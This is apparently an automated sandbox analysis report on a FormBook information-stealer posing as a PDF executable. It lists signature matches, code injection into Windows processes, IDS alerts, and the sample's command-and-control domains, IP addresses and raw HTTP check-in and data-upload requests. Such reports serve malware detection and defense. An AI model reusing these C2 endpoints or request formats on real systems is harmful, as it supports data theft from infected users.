Source: Yara match	File source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Specification and Quantity Pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: firefox.pdbP source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: wmplayer.exe, 00000006.00000003.1308686773.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.1311421220.0000000003659000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751897007.0000000004470000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1377466502.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751897007.000000000460E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1379009493.00000000042C5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wmplayer.exe, wmplayer.exe, 00000006.00000003.1308686773.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.1311421220.0000000003659000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000002.3751897007.0000000004470000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1377466502.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751897007.000000000460E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1379009493.00000000042C5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: wmplayer.exe, 00000006.00000002.1377678931.00000000037D0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377431064.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000002.3751441685.0000000000E90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: wmplayer.exe, 00000006.00000002.1377678931.00000000037D0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377431064.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751441685.0000000000E90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wmplayer.pdbGCTL source: rundll32.exe, 0000000A.00000002.3749703001.00000000007E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wmplayer.pdb source: rundll32.exe, 0000000A.00000002.3749703001.00000000007E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 4x nop then push rdi	0_2_00007FF773D34450
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 4x nop then push rdi	0_2_00007FF773D30200
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF773D0CC30
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF773CDFAA0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF773D37A90
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF773CDF9C0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 4x nop then mov rax, rcx	0_2_00007FF773CC9FC0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 4x nop then pop edi	6_2_00417D89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	10_2_00356CB3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	10_2_00357D89

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49713 -> 23.227.38.74:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49713 -> 23.227.38.74:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49713 -> 23.227.38.74:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49716 -> 78.46.88.140:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49716 -> 78.46.88.140:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49716 -> 78.46.88.140:80
Source: Network traffic	Suricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.7:49714 -> 23.227.38.74:80
Source: Network traffic	Suricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.7:49715 -> 203.161.60.191:80
Source: Network traffic	Suricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.7:49717 -> 78.46.88.140:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 203.161.60.191 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.playdoapp.online/n7ak/

Source: global traffic

HTTP traffic detected: GET /n7ak/?OrT4vp=D48xOFEPf6J&nrCxNDk=X95XYDcr/0ovQl8dFDDB2DmtDdbecE+v1errdqyRv2syAHM7RuOPKheDNorHxKs8v8dmbSYlDw== HTTP/1.1Host: www.tuktukwines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 23.227.38.74 23.227.38.74

Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 8_2_10A47F82 getaddrinfo,setsockopt,recv,

8_2_10A47F82

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: www.supremeajock.biz
Source: global traffic	DNS traffic detected: DNS query: www.1690.biz
Source: global traffic	DNS traffic detected: DNS query: www.ancientshadowguilt.space
Source: global traffic	DNS traffic detected: DNS query: www.maximsboutique.com
Source: global traffic	DNS traffic detected: DNS query: www.tuktukwines.com
Source: global traffic	DNS traffic detected: DNS query: www.playdoapp.online
Source: global traffic	DNS traffic detected: DNS query: www.taxuw.com
Source: global traffic	DNS traffic detected: DNS query: www.jam-nins.com
Source: global traffic	DNS traffic detected: DNS query: www.sdnaqianchuan.com
Source: global traffic	DNS traffic detected: DNS query: www.parkpeninsula.online
Source: global traffic	DNS traffic detected: DNS query: www.395boulderbrookdr.com
Source: global traffic	DNS traffic detected: DNS query: www.volkovastyu.com

Source: unknown

HTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.tuktukwines.comConnection: closeContent-Length: 133153Cache-Control: no-cacheOrigin: http://www.tuktukwines.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tuktukwines.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6e 72 43 78 4e 44 6b 3d 66 66 31 74 47 6c 55 67 7e 69 6c 34 62 48 4d 70 66 7a 53 41 6e 31 4b 57 58 4e 7a 38 54 30 76 76 73 36 36 4c 59 49 32 76 68 7a 59 57 48 6a 59 78 44 4d 6a 64 4d 33 66 59 59 6f 28 59 7e 65 67 66 75 36 78 39 5a 42 6f 45 48 4b 55 69 62 44 28 63 57 41 63 4f 52 67 4e 67 32 4d 38 33 39 39 4b 50 44 33 7e 4f 62 48 6b 42 70 75 49 56 79 30 4a 4f 4c 61 72 4d 7e 78 48 44 71 37 61 38 45 32 6f 33 44 4a 46 78 48 79 30 76 63 4f 52 72 7a 72 6d 63 37 50 45 66 70 53 65 2d 61 48 63 4e 44 72 6a 39 70 38 45 41 4c 33 73 50 32 69 4a 4e 67 4f 61 59 36 4e 7e 33 36 6b 64 75 52 55 43 39 42 66 61 43 72 62 38 67 36 72 56 73 42 69 62 71 37 61 6d 4d 70 4c 7e 64 6b 37 37 77 45 54 68 44 33 6a 62 58 35 43 46 4c 6d 6a 62 79 36 6a 4b 63 6b 6b 31 32 71 70 34 4a 69 51 59 6e 4e 6d 30 69 59 43 43 52 36 43 69 67 62 4c 42 30 47 55 36 66 73 76 74 61 5a 58 7a 41 79 59 5a 31 63 54 4d 64 34 66 50 49 30 41 48 51 33 44 4f 54 70 77 48 47 74 31 55 56 32 73 7a 31 48 78 57 6c 42 4f 75 46 43 6e 4d 70 39 75 36 55 48 72 41 77 7a 4b 39 47 44 49 37 4e 43 6c 4a 43 4c 66 49 79 4e 68 51 59 55 6a 6d 59 6b 57 64 6f 28 6d 63 79 45 61 61 78 54 5a 58 64 6a 36 69 37 76 58 46 70 69 63 48 74 72 31 74 56 41 56 42 74 71 73 6c 32 41 4d 50 4b 74 6d 66 75 67 32 77 5a 30 6c 76 4c 64 70 6a 46 77 74 32 4c 30 77 64 74 46 58 58 52 33 53 68 65 67 4e 6b 4c 37 31 6f 4c 76 38 79 35 64 51 64 2d 32 46 33 33 4e 67 4b 2d 68 72 33 76 66 38 32 30 55 39 49 72 6f 4a 5a 78 65 4c 4b 2d 37 45 46 6e 74 62 44 73 7e 4e 70 6f 68 2d 34 39 6b 7a 72 51 44 69 31 72 67 68 50 66 54 52 45 35 49 48 65 41 42 73 76 6d 54 57 42 6a 6f 76 7a 51 57 74 74 4e 39 48 70 53 59 63 4a 6e 4c 33 42 45 33 38 7e 43 53 71 47 34 44 6f 4f 48 69 55 51 58 62 65 34 4d 35 6a 77 56 45 45 6c 43 6b 33 55 47 55 54 30 5f 28 6d 66 67 38 6f 50 49 51 63 6c 6a 51 39 7a 64 67 7a 36 71 66 70 31 47 63 69 7a 6d 76 65 36 72 28 44 4f 67 59 35 6a 7a 55 36 78 42 58 52 6b 6e 4f 44 38 62 58 6e 6d 57 6b 6e 30 4f 49 53 64 4d 73 43 37 38 4b 54 71 35 41 71 7a 6d 44 56 6e 79 78 73 72 43 6a 54 61 74 4a 46 68 37 4e 4f 57 63 79 42 53 34 72 32 72 4e 74 6c 54 56 57 49 58 74 62 77 57 4d 33 4e 6e 5a 66 59 6a 4e 38 50 49 64 51 41 31 71 6b 76 36 36 56 53 34 4a 28 71 44 41 76 62 54 73 52 62 42 76 46 71 6a 53 30 64 51 65 5a 64 53 52 4e 55 39 44 43 51 4e 34 67 69 75 32 58 38 36 46 61 35 33 7a 66 4a 62 52 41 61 4c 6f 65 38 61 69 70 42 49 78 4a 59 76 39 38 70 56 4f 4c 38 71 62 57 72 53 77 36 69 30 75 71 6a 39 30 39 76 4d 36 36 6b 56 2d 59 30 48 61 4f 59 57 54 64 2d 74 6f 74 39 73 61 45 78 75 54 54 35 31 47 74 4f 76 59 62 56 61 72 63 4e 61 33 76 2d 28 30 77 79 30 6a 54 36 30 5f 52 58 6e

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 22 Sep 2024 15:27:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sun, 22 Sep 2024 15:27:27 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0FTsUAvKwEiZ3xh83g5%2Bv7bxN7oDtcOzSHFadiDKrLUdGKPZQGQ1Ifpo7oz9NVXw6uVe522O4MgjOch%2B9OFYWkh3OF1hnImFLmJLtOul4hBc8ERIJKi5BDDYp91oN3n7as01VA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=15.000105X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8c7351583c871895-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta ht
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 22 Sep 2024 15:27:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sun, 22 Sep 2024 15:27:27 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0FTsUAvKwEiZ3xh83g5%2Bv7bxN7oDtcOzSHFadiDKrLUdGKPZQGQ1Ifpo7oz9NVXw6uVe522O4MgjOch%2B9OFYWkh3OF1hnImFLmJLtOul4hBc8ERIJKi5BDDYp91oN3n7as01VA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=15.000105X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8c7351583c871895-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta ht

Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 00000008.00000003.3081808656.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1317815671.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000008.00000003.3081808656.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1317815671.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000008.00000003.3081808656.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1317815671.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: explorer.exe, 00000008.00000003.3081808656.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1317815671.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: explorer.exe, 00000008.00000002.3757019252.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3757051440.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3756253250.0000000007C70000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1690.biz
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1690.biz/n7ak/
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1690.biz/n7ak/www.ancientshadowguilt.space
Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1690.bizReferer:
